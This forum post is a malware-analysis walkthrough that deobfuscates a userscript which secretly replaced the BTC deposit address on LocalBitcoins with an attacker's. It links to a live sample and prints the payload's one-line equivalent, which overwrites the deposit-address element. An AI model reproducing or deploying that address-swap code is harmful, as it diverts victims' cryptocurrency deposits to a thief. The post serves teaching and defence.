September 18th, 2019 at 2:03 PM
Someone on another forum recently sent me a code sample of a script he claimed to be malicious. The script was installed through TamperMonkey/GreaseMonkey and was allegedly used for stealing BTC from LocalBitcoins silently.
On top of that, the user also claimed that the script would still be active even after uninstalling/removing the script from TamperMonkey, which I already believed to be highly improbable.
Code:
https://pastebin.com/1FVJCFa8
Note, that's a live sample. Don't install it. I've made an edit to it, specifically the BTC address of the attacker, so in the case that you do install it and lose BTC, send me a message and I'll refund you the amount (minus fees ofc.)
Since it's a web browser script, it's written in JavaScript.
Generally, the first thing you want to do when deobfuscating JavaScript is make it actually legible. Find the line endings, find where it should be indented, and so on.
For this, you can do it manually (find+replace ; with ;\n for line endings, then add tabs as you see fit), but in VSCode you can simply install a pretty-printing addon and format through there, or use a cool tool called JSBeautify (now known as Beautifier.io). A quick google will return the page; I don't feel like linking anything that isn't a pastebin.
After that, you'll get something that looks like this:
Code:
https://pastebin.com/5k5KhMPs
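If you're curious what the manual route boils down to, here's a rough sketch. roughFormat is a made-up helper name, and it's deliberately naive: it breaks lines on every ; { and } without knowing about string literals or for(;;) headers, so treat it as an illustration and use a real formatter for actual work.

```javascript
// Naive pretty-printer: newline after ';' and '{', dedent before '}'.
// It does not understand strings, comments or for(;;) headers.
function roughFormat(source) {
  let depth = 0;
  let out = "";
  for (const ch of source) {
    if (ch === "{") {
      depth++;
      out += "{\n" + "\t".repeat(depth);
    } else if (ch === "}") {
      depth = Math.max(0, depth - 1);
      // Drop the indentation emitted for the previous line, then close the block.
      out = out.trimEnd() + "\n" + "\t".repeat(depth) + "}\n" + "\t".repeat(depth);
    } else if (ch === ";") {
      out += ";\n" + "\t".repeat(depth);
    } else {
      out += ch;
    }
  }
  return out.trim();
}

console.log(roughFormat("var a=1;function f(){return a;}"));
```

Anything with a ; or a brace inside a string literal will get mangled by this, which is exactly why the proper tools are the better choice.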
Now, it's a user-script. User-scripts like this have meta-data. Have a look at the first nine lines. Specifically, have a look at lines 2, 5, 7.
2 gives the name of the script.
5 gives a description of what it's supposed to do (ie. misleading anyone who looks at the code.)
7 gives the rule for which sites this script works on.
Although the script claims to be used only for LocalBitcoins (LBTC) based on lines 2/5, line 7 tells us that the script is applied globally, ie. to every web page that is visited (unless the user has blacklisted the page in TamperMonkey). That's the first red flag.
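You can automate that check if you look at a lot of user-scripts. The sketch below is only that, a sketch: the header is a hypothetical one I wrote for illustration (not copied from the sample), parseMetadata and hasGlobalScope are made-up names, and the list of "global" patterns is not exhaustive.

```javascript
// Hypothetical header for illustration only; NOT copied from the sample.
const exampleHeader = [
  "// ==UserScript==",
  "// @name         LocalBitcoins helper",
  "// @description  Improves the LocalBitcoins interface",
  "// @include      *",
  "// ==/UserScript==",
].join("\n");

// Collect "@key value" pairs from the metadata block into { key: [values] }.
function parseMetadata(source) {
  const meta = {};
  const block = source.match(/\/\/ ==UserScript==([\s\S]*?)\/\/ ==\/UserScript==/);
  if (!block) return meta;
  for (const line of block[1].split("\n")) {
    const m = line.match(/^\/\/\s*@(\S+)\s+(.*)$/);
    if (m) (meta[m[1]] = meta[m[1]] || []).push(m[2].trim());
  }
  return meta;
}

// True when any @include/@match pattern covers every page (non-exhaustive list).
function hasGlobalScope(meta) {
  const patterns = [...(meta.include || []), ...(meta.match || [])];
  return patterns.some((p) => p === "*" || p === "*://*/*");
}

const parsed = parseMetadata(exampleHeader);
console.log(parsed.name[0]);         // LocalBitcoins helper
console.log(hasGlobalScope(parsed)); // true
```

A script whose name and description talk about one site while its scope covers all of them deserves a closer look.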
Now, it's time to do some actual deobfuscation.
First, we want to start converting all LITERALS.
This means strings, integers, and anything that isn't being referenced as an offset or another variable or something.
Note lines 13 and 63.
Line 13 is a hex-encoded string. You can tell by the \x delimiter between values, and that each value is a single byte (ie. two hexadecimal characters, 0-F.)
Line 63 is essentially the same thing, except there's more than one.
After decoding line 13, you get a string that looks a lot like base64:
Code:
Z2V0RWxlbWVudHNCeUNsYXNzTmFtZQ==
Plug it into a base64 decoder and you get:
Code:
getElementsByClassName
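Both decoding steps are easy to script. In the sketch below the escaped text is reconstructed from the base64 value quoted above (I'm assuming lowercase hex digits), and decodeHexEscapes/decodeBase64 are helper names I made up.

```javascript
// The escaped text, reconstructed from the base64 value quoted above.
// String.raw keeps the backslashes literal, the way they appear in the file.
const escaped = String.raw`\x5a\x32\x56\x30\x52\x57\x78\x6c\x62\x57\x56\x75\x64\x48\x4e\x43\x65\x55\x4e\x73\x59\x58\x4e\x7a\x54\x6d\x46\x74\x5a\x51\x3d\x3d`;

// Turn each textual \xNN escape back into the character it stands for.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// Use atob where it exists (browsers, recent Node), otherwise fall back to Buffer.
function decodeBase64(b64) {
  return typeof atob === "function"
    ? atob(b64)
    : Buffer.from(b64, "base64").toString("binary");
}

const base64Text = decodeHexEscapes(escaped);
const decoded = decodeBase64(base64Text);
console.log(base64Text); // Z2V0RWxlbWVudHNCeUNsYXNzTmFtZQ==
console.log(decoded);    // getElementsByClassName
```

If you paste the quoted string literal straight into a JS console, the engine does the hex step for you, since \xNN is an ordinary string escape.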
Alright! We have our first piece of information!
Generally, I don't modify code unless it's something that will be implicitly converted by the interpreter, ie. the web Javascript engine. This isn't being implicitly converted. It's a string type inside an array, at offset 0 (notice the square brackets.) It needs to be converted first somewhere down the line. Instead, I usually just add a little comment at the end of the line/variable declaration with the actual decoded value.
Code:
// getElementsByClassName
Now, don't be doing this all in the post here. Open up your text editor and paste in the pretty-printed script. After commenting, you can do another cool thing. The variable names are all scrambled with arbitrary hex values (prefixed with _.) Copy the variable name, paste it into find+replace. Rename it (and all of its instances) to getElementsString (or something easily recognizable, you can rename things later as you need to.)
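If your editor's find+replace doesn't have a "whole word" option, a few lines of script do the same job. This is a minimal sketch: _0xab12 and _0xab123 are hypothetical names (not taken from the sample), and renameIdentifier is a made-up helper.

```javascript
// Escape regex metacharacters so the identifier is matched literally.
function escapeRegExp(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Replace every whole-word occurrence of oldName with newName.
// Note: this also touches occurrences inside strings and comments.
function renameIdentifier(source, oldName, newName) {
  const pattern = new RegExp("\\b" + escapeRegExp(oldName) + "\\b", "g");
  return source.replace(pattern, () => newName);
}

// Hypothetical snippet: _0xab123 must NOT be renamed along with _0xab12.
const snippet = "var _0xab12 = ['x']; foo(_0xab12[0]); var _0xab123 = 1;";
const renamed = renameIdentifier(snippet, "_0xab12", "getElementsString");
console.log(renamed);
// var getElementsString = ['x']; foo(getElementsString[0]); var _0xab123 = 1;
```

The word boundaries matter because the scrambled names often share a prefix, and a plain substring replace would clobber the longer ones.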
Let's take a look at the bottom, line 63 where we have more literals. Do the exact same thing with the hex-encoded strings and you'll find that they aren't even base64 encoded as well, just hex'd.
Code:
'bitcoin-address bitcoin-address-controls',
'innerHTML',
'158MzR5HTL6c4insJts2XNnFdRMJwBgian'
Please note that that's my BTC address, not some attacker's. Don't try to report me to the FBI or something for financial crimeware. Like I said, if you send me money from there, I will simply refund it if you PM me.
You can use inline comments for these too, /* like this */
Okay, strings are done. You can already get a good idea what's going on in this script just by knowing these values. But if you're still confused, take it a step further.
So, we don't really have any more strings to fix (aside from the escaped sequence on line 29 if you want to edit that one too,) but we have two more things to do: integers/numbers and variable names.
You'll see most of the numbers in this code sample use hexadecimal notation again. Specifically, you'll notice an absolute ton of null bytes/0 values written as 0x0.
Find and replace again. Swap 0x0 with a simple 0. Watch out for the string-literal one on line 63 again.
Do this with every hexadecimal number you see. On line 37 in the loop you'll see 0x40, 0xff, 0x4, and more. Replace them as necessary, but be aware of what's going on. 0xff is being used as a mask with the bitwise & operator. Likely best to leave that one alone. But also keep in mind that 0xzznn & 0xff will always be equal to the lowest byte (the last two hex digits), ie. 0xnn. Maybe we can use that later.
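If you don't trust your mental hex-to-decimal conversion, let the console do it. The values below are the ones mentioned above; lowByte and hexLiteralToDecimal are helper names I made up for the demo.

```javascript
// Hex literals are just another way of writing the same numbers.
console.log(0x0 === 0); // true
console.log(0x40);      // 64
console.log(0x4);       // 4
console.log(0xff);      // 255

// Convert the text of a hex literal into the text of its decimal form.
function hexLiteralToDecimal(text) {
  return String(Number(text));
}
console.log(hexLiteralToDecimal("0x40")); // 64

// & 0xff keeps only the lowest byte, ie. the last two hex digits.
function lowByte(value) {
  return value & 0xff;
}
console.log(lowByte(0x1234).toString(16)); // 34
console.log(lowByte(0xab) === 0xab);       // true
```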
Back to renaming. Specifically, variables.
We already renamed line 13. But what about others?
Line 34 presents us with something interesting: a character map. You guessed it: it's going to be used as offsets for converting integer values to ASCII characters. You can rename it to charsetMap or something.
But now this raises another question: why is the charset being brought up here? Like I mentioned, it's probably being used for conversion. I'll get back to it, because I need to explain a couple of lesser-known features of JavaScript first:
Closures:
Closures are basically functions that remember the scope they were defined in. An inner function can keep reading and writing the variables of the function around it, even after that outer function has returned, which effectively gives you private variables that only those inner functions can touch.
Take a look at the example at W3Schools for more info; this isn't a JavaScript tutorial.
Basically, this entire script is built out of closures: functions nested inside other functions that share the outer variables. Literally. Read from line 10.
This is in part due to how tamper/greasemonkey work, but also for the sake of allowing this script to work even through obfuscation.
So when we're talking about introducing a charset here, it's because it's about to be used in another function.
(I hope you remembered to find+replace the name of the charset variable everywhere and not just the variable itself!)
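For anyone who wants the closure idea in a few lines, here's a minimal sketch. It's a hypothetical miniature, not the sample's code: makeCharLookup is a made-up name, and I'm assuming the charset is the standard base64 alphabet.

```javascript
// The outer function owns charsetMap; nothing outside can see it directly.
function makeCharLookup() {
  const charsetMap =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  // The returned function closes over charsetMap and can still read it
  // after makeCharLookup has finished running.
  return function (index) {
    return charsetMap.charAt(index);
  };
}

const charAtOffset = makeCharLookup();
console.log(charAtOffset(0));   // A
console.log(charAtOffset(26));  // a
console.log(typeof charsetMap); // undefined (not visible out here)
```

That's the whole trick: declare the data in an outer function, and hand out inner functions that use it.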
Another cool feature of JavaScript is what I'll call Array Notation (the usual name is bracket notation). And no, I'm not talking about declaring/using arrays:
Array Notation (ON OBJECTS!)
Let's use an array as an example.
Code:
var myArray = [1, 2, 3];
We can push new items into the array using the .push() method, right?
Code:
myArray.push(4)
Printing the array will yield [1,2,3,4]
But you can also do some pretty f*** stuff with calling that method. By f***, I mean we can pass the method name as a string to the object, using the same square-bracket notation you'd use for indexing into the array:
Code:
myArray['push'](4)
Google for 'object property accessor' or 'object bracket notation' to find a couple articles on why/how this is used.
What's relevant is that this is used almost EVERYWHERE in this code sample!
Even the push() and shift() array methods are being called using that notation on line 17.
And immediately, that tells us that the variable it's being used with (and the variables in the brackets) are all of array type! You can comment them or rename them as you choose.
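A push/shift pair written this way usually means the script is rotating an array. I can't confirm from the post alone that line 17 does exactly this, so take the sketch below as the general pattern; rotate, table and methodNames are hypothetical names.

```javascript
// Move the first element to the end, `times` times.
// array["push"](array["shift"]()) is the same as array.push(array.shift()).
function rotate(array, times) {
  for (let i = 0; i < times; i++) {
    array["push"](array["shift"]());
  }
  return array;
}

const table = ["a", "b", "c", "d"];
console.log(rotate(table, 1).join(",")); // b,c,d,a

// Because the method name is just a string, it can come from anywhere,
// including another array. That's what makes this handy for obfuscation.
const methodNames = ["push", "shift"];
table[methodNames[0]](table[methodNames[1]]());
console.log(table.join(",")); // c,d,a,b
```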
But what's even more interesting is what goes on down by the charset we brought up earlier.
Right below it, in the loop, you can see a variable accessing something called 'atob'.
If you've done any JS development, you might have come across this function before: it takes a base64-encoded string and returns the decoded data as a plain string.
So essentially, this entire function/loop is dedicated to converting the variable from line 13!
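To make the charset's role concrete, here's a readable sketch of a hand-rolled base64 decoder. It's my own reconstruction of the general technique, not the sample's code: charsetMap is assumed to be the standard base64 alphabet, and manualAtob is a made-up name. Every character is worth 6 bits (64 possible values), and the 0xff mask pulls out one byte at a time.

```javascript
// Assumed: the standard base64 alphabet, where a character's offset is its value.
const charsetMap =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

function manualAtob(input) {
  const clean = String(input).replace(/=+$/, ""); // drop the padding
  let output = "";
  let bits = 0;     // bit buffer
  let bitCount = 0; // how many bits in the buffer are valid
  for (const ch of clean) {
    const value = charsetMap.indexOf(ch);
    if (value === -1) continue; // ignore anything outside the alphabet
    bits = (bits << 6) | value; // append 6 bits
    bitCount += 6;
    if (bitCount >= 8) {
      bitCount -= 8;
      // Take the top 8 valid bits as one character...
      output += String.fromCharCode((bits >> bitCount) & 0xff);
      // ...and keep only the leftover low bits.
      bits &= (1 << bitCount) - 1;
    }
  }
  return output;
}

console.log(manualAtob("Z2V0RWxlbWVudHNCeUNsYXNzTmFtZQ=="));
// getElementsByClassName
```

Obfuscators tend to ship a decoder like this so the script doesn't depend on the environment providing atob.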
You can slowly trudge through the code more if you want, but at this point, it's safe to say we've figured out the sample's behaviour without needing to install it:
On line 63, with all the other strings we decoded earlier, it calls the document object's getElementsByClassName method. Don't worry too much about the 0x0/0 that comes right after it (or within it); it's most likely just an index picking the first entry. It looks up elements with the classes 'bitcoin-address bitcoin-address-controls' and, if it finds anything, sets the element's innerHTML property to the BTC address.
In other words, all that code simply does what a one-liner does:
Code:
document.getElementsByClassName('bitcoin-address bitcoin-address-controls')[0].innerHTML = "BTC-ADDRESS";
Seems mostly harmless.
But where do we find the bitcoin-address* classnames on LBTC?
Right on the deposit page.
When you want to convert your hard-earned BTC to cash, bank transfer, paypal, or whatever, you need to deposit that BTC on their site using the address they give you on the deposit page.
When you open that page with the script installed, it silently swaps the displayed address for the attacker's, so you end up sending your BTC to the attacker.
So back to the original questions on behaviour:
--Is the script harmful?
--Will it survive uninstalls?
--Will it steal all your BTC?
1. Yes. We've established that through de-ob.
2. This script shows no signs of that.
3. No, but it will try to mislead you into sending BTC to a different address than the one provided by LBTC, which can cause you to lose some money.
So what about question two?
After questioning the user more about what other addresses were allegedly changed to, he replied with a different address than that initially decoded from the sample.
It's likely he had other malware on his system installed and thought that removing this one script would make him clean.
His fault, I guess.
That concludes this little walkthrough. You can play around with the sample above. It's not my code and I don't assume any responsibility for damages done using the live sample. I'm only posting it here to show how deobfuscation works.
I can post more walkthroughs regarding obfuscated code if you'd like. Most of it is regarding scripting languages, though, nothing native that's noteworthy, yet.